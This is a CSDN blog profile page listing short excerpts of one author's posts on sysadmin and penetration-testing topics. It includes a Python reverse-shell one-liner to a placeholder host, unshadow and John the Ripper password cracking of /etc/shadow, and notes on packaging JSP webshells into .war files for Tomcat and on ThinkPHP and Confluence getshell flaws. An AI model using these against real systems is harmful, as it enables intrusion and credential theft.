JoyFire
码龄5年
关注
提问 私信
  • 博客:18,434
    18,434
    总访问量
  • 8
    原创
  • 569,442
    排名
  • 5
    粉丝
  • 0
    铁粉
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:新疆
  • 加入CSDN时间: 2019-07-22
博客简介:

weixin_45439698的博客

查看详细资料
个人成就
  • 获得8次点赞
  • 内容获得0次评论
  • 获得35次收藏
创作历程
  • 1篇
    2021年
  • 2篇
    2020年
  • 9篇
    2019年
成就勋章
TA的专栏
  • Ubuntu mail
    1篇
  • 技术
    11篇
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

342人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

2021-01-06

Windows防火墙下禁止/开启ping命令(精简版)开启Windows防火墙 –> 高级设置 –> 入站规则 –> 在列表里找到“文件和打印机共享(回显请求 – ICMPv4-In)” –> 右击选择启用规则,并在其属性里设置为‘允许连接’–> 确定 。禁用看是有三项,都是启用。分别在三项上右键,选择“禁用规则”...
原创
发布博客 2021.01.06 ·
130 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Tomcat后台弱口令漏洞及war码制作

重点来了:那儿只能上传文件后缀为.war,那么它是什么呢?你可以理解为就是一个包,然后它里面包含一个xx.jsp的木马,那么怎么制作它呢?1.先找到一个jsp的大马,然后放到文本文档里,然后用解压软件解压为rar的文件,再更改一下后缀为war即可。还有一种方式,利用cmd命令行来做,具体参考(http://admin-yuku.lofter.com/post/1cbd1826_4383805)...
原创
发布博客 2020.04.29 ·
429 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

ubuntu sendmail配置发送邮件

ubuntu中sendmail函数可以很方便的发送邮件,ubuntu sendmail先要安装两个包。必需安装的两个包:代码sudo apt-get install sendmailsudo apt-get install sendmail-cf下面几个包是可选的:代码squirrelmail //提供webmailspamassassin ...
原创
发布博客 2020.02.24 ·
394 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Ubuntu mail 配置

ubuntu sendmail配置发送邮件ubuntu中sendmail函数可以很方便的发送邮件,ubuntu sendmail先要安装两个包。必需安装的两个包:代码sudo apt-get install sendmailsudo apt-get install sendmail-cf下面几个包是可选的:代码squirrelmail //提供webmai...
原创
发布博客 2019.10.26 ·
593 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

John the Ripper 密码破解工具

破解Linux的用户密码:John 【跨平台的密码解密工具】root@only:~# unshadow /etc/passwd /etc/shadow > ~/file_to_crackroot@only:~# john --wordlist=/usr/share/john/password.lst ~/file_to_crackrm -rf /root/.john/john.pot...
原创
发布博客 2019.09.19 ·
424 阅读 ·
1 点赞 ·
0 评论 ·
2 收藏

用命令创建MySQL数据库

一、连接MYSQL格式: mysql -h主机地址 -u用户名 -p用户密码1、 连接到本机上的MYSQL。首先打开DOS窗口,然后进入目录mysql\bin,再键入命令mysql -u root -p,回车后提示你输密码.注意用户名前可以有空格也可以没有空格,但是密码前必须没有空格,否则让你重新输入密码.如果刚安装好MYSQL,超级用户root是没有密码的,故直接回车即可进入到MYSQL...
原创
发布博客 2019.08.26 ·
598 阅读 ·
2 点赞 ·
0 评论 ·
4 收藏

ThinkPHP 漏洞检测

0x00 前言由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。0x01 影响范围5.x < 5.1.31, <= 5.0.230x02 漏洞分析Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/com...
原创
发布博客 2019.08.19 ·
1992 阅读 ·
0 点赞 ·
0 评论 ·
3 收藏

火狐破解收费hackbar

https://blog.csdn.net/qq_38963246/article/details/95489242
转载
发布博客 2019.07.30 ·
3254 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

未授权访问漏洞总结

未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。常见的未授权访问漏洞1.MongoDB 未授权访问漏洞2.Redis 未授权访问漏洞3.Memcached 未授权访问漏洞CVE-2013-72394.JBOSS 未授权访问漏洞5.VNC 未授权访问漏洞6.Docker 未授权访问漏...
转载
发布博客 2019.07.29 ·
6050 阅读 ·
3 点赞 ·
0 评论 ·
20 收藏

不小心执行 rm -f,该如何恢复?

1、删除误删除服务器目录/root/selenium/Spider下的MySql.Data.dll文件:rm -f /root/selenium/Spider/MySql.Data.dllll /root/selenium/Spider/MySql.Data.dllls: cannot access /root/selenium/Spider/MySql.Data.dll: No suc...
转载
发布博客 2019.07.29 ·
215 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

python 提权

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“IP”,18080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh"...
原创
发布博客 2019.07.22 ·
1471 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

CVE-2019-3396 实战反弹shell

前言距离4月4日Confluence官方发布远程命令执行高危漏洞的安全更新距今已快一周的时间。在网上也陆续爆出了一系列的POC,但是这些POC仅局限于测试是否存在漏洞,或者就是只是命令执行,并不能进行shell的反弹,如果不能反弹shell,那要这洞有何用。于是我花了一下午的时间去进行测试,才有了这篇利用该漏洞进行实战反弹shell的文章。准备鉴于网上已有一系列的分析文章,这里我也不做漏洞...
转载
发布博客 2019.07.22 ·
2880 阅读 ·
2 点赞 ·
0 评论 ·
2 收藏